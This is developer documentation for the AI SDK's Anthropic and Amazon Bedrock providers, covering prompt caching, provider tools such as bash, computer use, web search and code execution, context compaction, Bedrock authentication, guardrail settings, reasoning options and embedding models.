Cache Control

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const errorMessage = '... long error message ...';

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'You are a JavaScript expert.' },
        {
          type: 'text',
          text: `Error message: ${errorMessage}`,
          providerOptions: {
            anthropic: { cacheControl: { type: 'ephemeral' } },
          },
        },
        { type: 'text', text: 'Explain the error message.' },
      ],
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118 }

You can also use cache control on system messages by providing multiple system messages at the head of your messages array:

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'system',
      content: 'Cached system message part',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'system',
      content: 'Uncached system message part',
    },
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

Cache control for tools:

const result = await generateText({
  model: anthropic('claude-3-5-haiku-latest'),
  tools: {
    cityAttractions: tool({
      inputSchema: z.object({ city: z.string() }),
      providerOptions: {
        anthropic: {
          cacheControl: { type: 'ephemeral' },
        },
      },
    }),
  },
  messages: [
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

Longer cache TTL

Anthropic also supports a longer 1-hour cache duration.

Here's an example:

const result = await generateText({
  model: anthropic('claude-3-5-haiku-latest'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Long cached message',
          providerOptions: {
            anthropic: {
              cacheControl: { type: 'ephemeral', ttl: '1h' },
            },
          },
        },
      ],
    },
  ],
});

Limitations

The minimum cacheable prompt length is:

1024 tokens for Claude 3.7 Sonnet, Claude 3.5 Sonnet and Claude 3 Opus
2048 tokens for Claude 3.5 Haiku and Claude 3 Haiku

Shorter prompts cannot be cached, even if marked with cacheControl. Any requests to cache fewer than this number of tokens will be processed without caching.

For more on prompt caching with Anthropic, see Anthropic's Cache Control documentation.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = anthropic.tools.bash_20241022({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Memory Tool

The Memory Tool allows Claude to use a local memory, e.g. in the filesystem. Here's how to create it:

const memory = anthropic.tools.memory_20250818({
  execute: async action => {
    // Implement your memory command execution logic here
    // Return the result of the command execution
  },
});

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files.

const tools = {
  // tool name must be str_replace_based_edit_tool
  str_replace_based_edit_tool: anthropic.tools.textEditor_20250728({
    maxCharacters: 10000, // optional
    async execute({ command, path, old_str, new_str }) {
      // ...
    },
  }),
} satisfies ToolSet;

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is only available in Claude 3.5 Sonnet and earlier models.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace or insert commands.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = anthropic.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments

  execute: async ({ action, coordinate, text }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  toModelOutput(result) {
    return typeof result === 'string'
      ? [{ type: 'text', text: result }]
      : [{ type: 'image', data: result.data, mediaType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.

These tools can be used in conjunction with the sonnet-3-5-sonnet-20240620 model to enable more complex interactions and tasks.

Web Search Tool

Anthropic provides a provider-defined web search tool that gives Claude direct access to real-time web content, allowing it to answer questions with up-to-date information beyond its knowledge cutoff.

You can enable web search using the provider-defined web search tool:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const webSearchTool = anthropic.tools.webSearch_20250305({
  maxUses: 5,
});

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'What are the latest developments in AI?',
  tools: {
    web_search: webSearchTool,
  },
});

Configuration Options

The web search tool supports several configuration options:

maxUses number

Maximum number of web searches Claude can perform during the conversation.
allowedDomains string[]

Optional list of domains that Claude is allowed to search. If provided, searches will be restricted to these domains.
blockedDomains string[]

Optional list of domains that Claude should avoid when searching.
userLocation object

Optional user location information to provide geographically relevant search results.

const webSearchTool = anthropic.tools.webSearch_20250305({
  maxUses: 3,
  allowedDomains: ['techcrunch.com', 'wired.com'],
  blockedDomains: ['example-spam-site.com'],
  userLocation: {
    type: 'approximate',
    country: 'US',
    region: 'California',
    city: 'San Francisco',
    timezone: 'America/Los_Angeles',
  },
});

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Find local news about technology',
  tools: {
    web_search: webSearchTool,
  },
});

Web Fetch Tool

Anthropic provides a provider-defined web fetch tool that allows Claude to retrieve content from specific URLs. This is useful when you want Claude to analyze or reference content from a particular webpage or document.

You can enable web fetch using the provider-defined web fetch tool:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-0'),
  prompt:
    'What is this page about? https://en.wikipedia.org/wiki/Maglemosian_culture',
  tools: {
    web_fetch: anthropic.tools.webFetch_20250910({ maxUses: 1 }),
  },
});

Configuration Options

The web fetch tool supports several configuration options:

maxUses number

The maxUses parameter limits the number of web fetches performed.
allowedDomains string[]

Only fetch from these domains.
blockedDomains string[]

Never fetch from these domains.
citations object

Unlike web search where citations are always enabled, citations are optional for web fetch. Set "citations": {"enabled": true} to enable Claude to cite specific passages from fetched documents.
maxContentTokens number

The maxContentTokens parameter limits the amount of content that will be included in the context.

Error Handling

Web search errors are handled differently depending on whether you're using streaming or non-streaming:

Non-streaming (generateText, generateObject): Web search errors throw exceptions that you can catch:

try {
  const result = await generateText({
    model: anthropic('claude-opus-4-20250514'),
    prompt: 'Search for something',
    tools: {
      web_search: webSearchTool,
    },
  });
} catch (error) {
  if (error.message.includes('Web search failed')) {
    console.log('Search error:', error.message);
    // Handle search error appropriately
  }
}

Streaming (streamText, streamObject): Web search errors are delivered as error parts in the stream:

const result = await streamText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Search for something',
  tools: {
    web_search: webSearchTool,
  },
});

for await (const part of result.textStream) {
  if (part.type === 'error') {
    console.log('Search error:', part.error);
    // Handle search error appropriately
  }
}

Code Execution

Anthropic provides a provider-defined code execution tool that gives Claude direct access to a real Python environment allowing it to execute code to inform its responses.

You can enable code execution using the provider-defined code execution tool:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const codeExecutionTool = anthropic.tools.codeExecution_20260120();

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt:
    'Calculate the mean and standard deviation of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]',
  tools: {
    code_execution: codeExecutionTool,
  },
});

Error Handling

Code execution errors are handled differently depending on whether you're using streaming or non-streaming:

Non-streaming (generateText, generateObject): Code execution errors are delivered as tool result parts in the response:

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Execute some Python script',
  tools: {
    code_execution: codeExecutionTool,
  },
});

const toolErrors = result.content?.filter(
  content => content.type === 'tool-error',
);

toolErrors?.forEach(error => {
  console.error('Tool execution error:', {
    toolName: error.toolName,
    toolCallId: error.toolCallId,
    error: error.error,
  });
});

Streaming (streamText, streamObject): Code execution errors are delivered as error parts in the stream:

const result = await streamText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Execute some Python script',
  tools: {
    code_execution: codeExecutionTool,
  },
});
for await (const part of result.textStream) {
  if (part.type === 'error') {
    console.log('Code execution error:', part.error);
    // Handle code execution error appropriately
  }
}

Agent Skills

Anthropic Agent Skills enable Claude to perform specialized tasks like document processing (PPTX, DOCX, PDF, XLSX) and data analysis. Skills run in a sandboxed container and require the code execution tool to be enabled.

Using Built-in Skills

Anthropic provides several built-in skills:

pptx - Create and edit PowerPoint presentations
docx - Create and edit Word documents
pdf - Process and analyze PDF files
xlsx - Work with Excel spreadsheets

To use skills, you need to:

Enable the code execution tool
Specify the container with skills in providerOptions

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),
  },
  prompt: 'Create a presentation about renewable energy with 5 slides',
  providerOptions: {
    anthropic: {
      container: {
        skills: [
          {
            type: 'anthropic',
            skillId: 'pptx',
            version: 'latest', // optional
          },
        ],
      },
    } satisfies AnthropicProviderOptions,
  },
});

Custom Skills

You can also use custom skills by specifying type: 'custom':

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),
  },
  prompt: 'Use my custom skill to process this data',
  providerOptions: {
    anthropic: {
      container: {
        skills: [
          {
            type: 'custom',
            skillId: 'my-custom-skill-id',
            version: '1.0', // optional
          },
        ],
      },
    } satisfies AnthropicProviderOptions,
  },
});

Compaction

The compact_20260112 edit type automatically summarizes earlier conversation context when token limits are reached. This is useful for long-running conversations where you want to preserve the essence of earlier exchanges while staying within token limits.

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText } from 'ai';

const result = streamText({
  model: anthropic('claude-opus-4-6'),
  messages: conversationHistory,
  providerOptions: {
    anthropic: {
      contextManagement: {
        edits: [
          {
            type: 'compact_20260112',
            trigger: {
              type: 'input_tokens',
              value: 50000, // trigger compaction when input exceeds 50k tokens
            },
            instructions:
              'Summarize the conversation concisely, preserving key decisions and context.',
            pauseAfterCompaction: false,
          },
        ],
      },
    } satisfies AnthropicProviderOptions,
  },
});

Configuration:

trigger - Condition that triggers compaction (e.g., { type: 'input_tokens', value: 50000 })
instructions - Custom instructions for how the model should summarize the conversation. Use this to guide the compaction summary towards specific aspects of the conversation you want to preserve.
pauseAfterCompaction - When true, the model will pause after generating the compaction summary, allowing you to inspect or process it before continuing. Defaults to false.

When compaction occurs, the model generates a summary of the earlier context. This summary appears as a text block with special provider metadata.

Detecting Compaction in Streams

When using streamText, you can detect compaction summaries by checking the providerMetadata on text-start events:

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'text-start': {
      const isCompaction =
        part.providerMetadata?.anthropic?.type === 'compaction';
      if (isCompaction) {
        console.log('[COMPACTION SUMMARY START]');
      }
      break;
    }
    case 'text-delta': {
      process.stdout.write(part.text);
      break;
    }
  }
}

Compaction in UI Applications

When using useChat or other UI hooks, compaction summaries appear as regular text parts with providerMetadata. You can style them differently in your UI:

{
  message.parts.map((part, index) => {
    if (part.type === 'text') {
      const isCompaction =
        (part.providerMetadata?.anthropic as { type?: string } | undefined)
          ?.type === 'compaction';

      if (isCompaction) {
        return (
          <div
            key={index}
            className="bg-yellow-100 border-l-4 border-yellow-500 p-2"
          >
            <span className="font-bold">[Compaction Summary]</span>
            <div>{part.text}</div>
          </div>
        );
      }
      return <div key={index}>{part.text}</div>;
    }
  });
}

PDF support

Anthropic Sonnet claude-3-5-sonnet-20241022 supports reading PDF files. You can pass PDF files as part of the message content using the file type:

Option 1: URL-based PDF document

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: new URL(
            'https://github.com/vercel/ai/blob/main/examples/ai-core/data/ai.pdf?raw=true',
          ),
          mimeType: 'application/pdf',
        },
      ],
    },
  ],
});

Option 2: Base64-encoded PDF document

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Computer Use	Web Search	Tool Search	Compaction
`claude-opus-4-7`
`claude-opus-4-6`
`claude-sonnet-4-6`
`claude-opus-4-5`
`claude-haiku-4-5`
`claude-sonnet-4-5`
`claude-opus-4-1`
`claude-opus-4-0`
`claude-sonnet-4-0`
`claude-3-7-sonnet-latest`
`claude-3-5-haiku-latest`

title: Amazon Bedrock description: Learn how to use the Amazon Bedrock provider.

Amazon Bedrock Provider

The Amazon Bedrock provider for the AI SDK contains language model support for the Amazon Bedrock APIs.

Setup

The Bedrock provider is available in the @ai-sdk/amazon-bedrock module. You can install it with

Prerequisites

See the Model Access Docs for more information.

Authentication

Using IAM Access Key and Secret Key

Step 1: Creating AWS Access Key and Secret Key

To get started, you'll need to create an AWS access key and secret key. Here's how:

Login to AWS Management Console

Go to the AWS Management Console and log in with your AWS account credentials.

Create an IAM User

Navigate to the IAM dashboard and click on "Users" in the left-hand navigation menu.
Click on "Create user" and fill in the required details to create a new IAM user.
Make sure to select "Programmatic access" as the access type.
The user account needs the AmazonBedrockFullAccess policy attached to it.

Create Access Key

Click on the "Security credentials" tab and then click on "Create access key".
Click "Create access key" to generate a new access key pair.
Download the .csv file containing the access key ID and secret access key.

Step 2: Configuring the Access Key and Secret Key

Within your project add a .env file if you don't already have one. This file will be used to set the access key and secret key as environment variables. Add the following lines to the .env file:

AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY=YOUR_SECRET_ACCESS_KEY
AWS_REGION=YOUR_REGION

Remember to replace YOUR_ACCESS_KEY_ID, YOUR_SECRET_ACCESS_KEY, and YOUR_REGION with the actual values from your AWS account.

Using AWS SDK Credentials Chain (instance profiles, instance roles, ECS roles, EKS Service Accounts, etc.)

Usage:

@aws-sdk/credential-providers package provides a set of credential providers that can be used to create a credential provider chain.

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
import { fromNodeProviderChain } from '@aws-sdk/credential-providers';

const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  credentialProvider: fromNodeProviderChain(),
});

Provider Instance

You can import the default provider instance bedrock from @ai-sdk/amazon-bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';

If you need a customized setup, you can import createAmazonBedrock from @ai-sdk/amazon-bedrock and create a provider instance with your settings:

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';

const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  accessKeyId: 'xxxxxxxxx',
  secretAccessKey: 'xxxxxxxxx',
  sessionToken: 'xxxxxxxxx',
});

You can use the following optional settings to customize the Amazon Bedrock provider instance:

region string

The AWS region that you want to use for the API calls. It uses the AWS_REGION environment variable by default.
accessKeyId string

The AWS access key ID that you want to use for the API calls. It uses the AWS_ACCESS_KEY_ID environment variable by default.
secretAccessKey string

The AWS secret access key that you want to use for the API calls. It uses the AWS_SECRET_ACCESS_KEY environment variable by default.
sessionToken string

Optional. The AWS session token that you want to use for the API calls. It uses the AWS_SESSION_TOKEN environment variable by default.
credentialProvider () => Promise<{ accessKeyId: string; secretAccessKey: string; sessionToken?: string; }>

Optional. The AWS credential provider chain that you want to use for the API calls. It uses the specified credentials by default.

Language Models

You can create models that call the Bedrock API using the provider instance. The first argument is the model id, e.g. meta.llama3-70b-instruct-v1:0.

const model = bedrock('meta.llama3-70b-instruct-v1:0');

Amazon Bedrock models also support some model specific provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

const model = bedrock('anthropic.claude-3-sonnet-20240229-v1:0');

await generateText({
  model,
  providerOptions: {
    anthropic: {
      additionalModelRequestFields: { top_k: 350 },
    },
  },
});

Documentation for additional settings based on the selected model can be found within the Amazon Bedrock Inference Parameter Documentation.

You can use Amazon Bedrock language models to generate text with the generateText function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Amazon Bedrock language models can also be used in the streamText function (see AI SDK Core).

File Inputs

The Amazon Bedrock provider supports file inputs, e.g. PDF files.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('anthropic.claude-3-haiku-20240307-v1:0'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe the pdf in detail.' },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

Guardrails

You can use the bedrock provider options to utilize Amazon Bedrock Guardrails:

const result = await generateText({
  model: bedrock('anthropic.claude-3-sonnet-20240229-v1:0'),
  prompt: 'Write a story about space exploration.',
  providerOptions: {
    bedrock: {
      guardrailConfig: {
        guardrailIdentifier: '1abcd2ef34gh',
        guardrailVersion: '1',
        trace: 'enabled' as const,
        streamProcessingMode: 'async',
      },
    },
  },
});

Tracing information will be returned in the provider metadata if you have tracing enabled.

if (result.providerMetadata?.bedrock.trace) {
  // ...
}

See the Amazon Bedrock Guardrails documentation for more information.

Citations

Amazon Bedrock supports citations for document-based inputs across compatible models. When enabled:

Some models can read documents with visual understanding, not just extracting text
Models can cite specific parts of documents you provide, making it easier to trace information back to its source (Not Supported Yet)

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateObject } from 'ai';
import { z } from 'zod';
import fs from 'fs';

const result = await generateObject({
  model: bedrock('apac.anthropic.claude-sonnet-4-20250514-v1:0'),
  schema: z.object({
    summary: z.string().describe('Summary of the PDF document'),
    keyPoints: z.array(z.string()).describe('Key points from the PDF'),
  }),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Summarize this PDF and provide key points.',
        },
        {
          type: 'file',
          data: fs.readFileSync('./document.pdf'),
          mediaType: 'application/pdf',
          providerOptions: {
            bedrock: {
              citations: { enabled: true },
            },
          },
        },
      ],
    },
  ],
});

console.log('Response:', result.object);

Cache Points

Cache usage information is returned in the providerMetadata object`. See examples below.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const cyberpunkAnalysis =
  '... literary analysis of cyberpunk themes and concepts ...';

const result = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  messages: [
    {
      role: 'system',
      content: `You are an expert on William Gibson's cyberpunk literature and themes. You have access to the following academic analysis: ${cyberpunkAnalysis}`,
      providerOptions: {
        bedrock: { cachePoint: { type: 'default' } },
      },
    },
    {
      role: 'user',
      content:
        'What are the key cyberpunk themes that Gibson explores in Neuromancer?',
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.bedrock?.usage);
// Shows cache read/write token usage, e.g.:
// {
//   cacheReadInputTokens: 1337,
//   cacheWriteInputTokens: 42,
// }

Cache points also work with streaming responses:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';

const cyberpunkAnalysis =
  '... literary analysis of cyberpunk themes and concepts ...';

const result = streamText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  messages: [
    {
      role: 'assistant',
      content: [
        { type: 'text', text: 'You are an expert on cyberpunk literature.' },
        { type: 'text', text: `Academic analysis: ${cyberpunkAnalysis}` },
      ],
      providerOptions: { bedrock: { cachePoint: { type: 'default' } } },
    },
    {
      role: 'user',
      content:
        'How does Gibson explore the relationship between humanity and technology?',
    },
  ],
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log(
  'Cache token usage:',
  (await result.providerMetadata)?.bedrock?.usage,
);
// Shows cache read/write token usage, e.g.:
// {
//   cacheReadInputTokens: 1337,
//   cacheWriteInputTokens: 42,
// }

Reasoning

Amazon Bedrock supports model creator-specific reasoning features:

Anthropic (e.g. claude-3-7-sonnet-20250219): enable via the reasoningConfig provider option and specifying a thinking budget in tokens (minimum: 1024, maximum: 64000).
Amazon (e.g. us.amazon.nova-2-lite-v1:0): enable via the reasoningConfig provider option and specifying a maximum reasoning effort level ('low' | 'medium' | 'high').

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

// Anthropic example
const anthropicResult = await generateText({
  model: bedrock('us.anthropclaude-3-7-sonnet-20250219-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    bedrock: {
      reasoningConfig: { type: 'enabled', budgetTokens: 1024 },
    },
  },
});

console.log(anthropicResult.reasoning); // reasoning text
console.log(anthropicResult.text); // text response

// Nova 2 example
const amazonResult = await generateText({
  model: bedrock('us.amazon.nova-2-lite-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    bedrock: {
      reasoningConfig: { type: 'enabled', maxReasoningEffort: 'medium' },
    },
  },
});

console.log(amazonResult.reasoning); // reasoning text
console.log(amazonResult.text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Extended Context Window

Claude Sonnet 4 models on Amazon Bedrock support an extended context window of up to 1 million tokens when using the context-1m-2025-08-07 beta feature.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
  prompt: 'analyze this large document...',
  providerOptions: {
    bedrock: {
      anthropicBeta: ['context-1m-2025-08-07'],
    },
  },
});

Computer Use

Via Anthropic, Amazon Bedrock provides three provider-defined tools that can be used to interact with external systems:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.

They are available via the tools property of the provider instance.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = anthropic.tools.bash_20241022({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files.

For Claude 4 models (Opus & Sonnet):

const textEditorTool = anthropic.tools.textEditor_20250429({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

For Claude 3.5 Sonnet and earlier models:

const textEditorTool = anthropic.tools.textEditor_20241022({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is only available in Claude 3.5 Sonnet and earlier models.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace or insert commands.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.

When using the Text Editor Tool, make sure to name the key in the tools object correctly:

Claude 4 models: Use str_replace_based_edit_tool
Claude 3.5 Sonnet and earlier: Use str_replace_editor

// For Claude 4 models
const response = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
  prompt:
    "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    str_replace_based_edit_tool: textEditorTool, // Claude 4 tool name
  },
});

// For Claude 3.5 Sonnet and earlier
const response = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  prompt:
    "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    str_replace_editor: textEditorTool, // Earlier models tool name
  },
});

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = anthropic.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments

  execute: async ({ action, coordinate, text }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  toModelOutput(result) {
    return typeof result === 'string'
      ? [{ type: 'text', text: result }]
      : [{ type: 'image', data: result.data, mediaType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.

These tools can be used in conjunction with the anthropic.claude-3-5-sonnet-20240620-v1:0 model to enable more complex interactions and tasks.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`amazon.titan-tg1-large`
`amazon.titan-text-express-v1`
`amazon.titan-text-lite-v1`
`us.amazon.nova-premier-v1:0`
`us.amazon.nova-pro-v1:0`
`us.amazon.nova-lite-v1:0`
`us.amazon.nova-micro-v1:0`
`anthropic.claude-haiku-4-5-20251001-v1:0`
`anthropic.claude-sonnet-4-20250514-v1:0`
`anthropic.claude-sonnet-4-5-20250929-v1:0`
`anthropic.claude-opus-4-20250514-v1:0`
`anthropic.claude-opus-4-1-20250805-v1:0`
`anthropic.claude-3-7-sonnet-20250219-v1:0`
`anthropic.claude-3-5-sonnet-20241022-v2:0`
`anthropic.claude-3-5-sonnet-20240620-v1:0`
`anthropic.claude-3-5-haiku-20241022-v1:0`
`anthropic.claude-3-opus-20240229-v1:0`
`anthropic.claude-3-sonnet-20240229-v1:0`
`anthropic.claude-3-haiku-20240307-v1:0`
`us.anthropic.claude-sonnet-4-20250514-v1:0`
`us.anthropic.claude-sonnet-4-5-20250929-v1:0`
`us.anthropic.claude-opus-4-20250514-v1:0`
`us.anthropic.claude-opus-4-1-20250805-v1:0`
`us.anthropic.claude-3-7-sonnet-20250219-v1:0`
`us.anthropic.claude-3-5-sonnet-20241022-v2:0`
`us.anthropic.claude-3-5-sonnet-20240620-v1:0`
`us.anthropic.claude-3-5-haiku-20241022-v1:0`
`us.anthropic.claude-3-sonnet-20240229-v1:0`
`us.anthropic.claude-3-opus-20240229-v1:0`
`us.anthropic.claude-3-haiku-20240307-v1:0`
`anthropic.claude-v2`
`anthropic.claude-v2:1`
`anthropic.claude-instant-v1`
`cohere.command-text-v14`
`cohere.command-light-text-v14`
`cohere.command-r-v1:0`
`cohere.command-r-plus-v1:0`
`us.deepseek.r1-v1:0`
`meta.llama3-8b-instruct-v1:0`
`meta.llama3-70b-instruct-v1:0`
`meta.llama3-1-8b-instruct-v1:0`
`meta.llama3-1-70b-instruct-v1:0`
`meta.llama3-1-405b-instruct-v1:0`
`meta.llama3-2-1b-instruct-v1:0`
`meta.llama3-2-3b-instruct-v1:0`
`meta.llama3-2-11b-instruct-v1:0`
`meta.llama3-2-90b-instruct-v1:0`
`us.meta.llama3-2-1b-instruct-v1:0`
`us.meta.llama3-2-3b-instruct-v1:0`
`us.meta.llama3-2-11b-instruct-v1:0`
`us.meta.llama3-2-90b-instruct-v1:0`
`us.meta.llama3-1-8b-instruct-v1:0`
`us.meta.llama3-1-70b-instruct-v1:0`
`us.meta.llama3-3-70b-instruct-v1:0`
`us.meta.llama4-scout-17b-instruct-v1:0`
`us.meta.llama4-maverick-17b-instruct-v1:0`
`mistral.mistral-7b-instruct-v0:2`
`mistral.mixtral-8x7b-instruct-v0:1`
`mistral.mistral-large-2402-v1:0`
`mistral.mistral-small-2402-v1:0`
`us.mistral.pixtral-large-2502-v1:0`
`openai.gpt-oss-120b-1:0`
`openai.gpt-oss-20b-1:0`

Embedding Models

You can create models that call the Bedrock API Bedrock API using the .textEmbedding() factory method.

const model = bedrock.textEmbedding('amazon.titan-embed-text-v1');

Bedrock Titan embedding model amazon.titan-embed-text-v2:0 supports several additional settings. You can pass them as an options argument:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';

const model = bedrock.textEmbedding('amazon.titan-embed-text-v2:0');

const { embedding } = await embed({
  model,
  value: 'sunny day at the beach',
  providerOptions: {
    bedrock: {
      dimensions: 512, // optional, number of dimensions for the embedding
      normalize: true, // optional, normalize the output embeddings
    },
  },
});

The following optional provider options are available for Bedrock Titan embedding models:

dimensions: number

The number of dimensions the output embeddings should have. The following values are accepted: 1024 (default), 512, 256.
normalize boolean

Flag indicating whether or not to normalize the output embeddings. Defaults to true.

Model Capabilities

Model	Default Dimensions	Custom Dimensions
`amazon.titan-embed-text-v1`	1536
`amazon.titan-embed-text-v2:0`	1024
`cohere.embed-english-v3`	1024
`cohere.embed-multilingual-v3`	1024

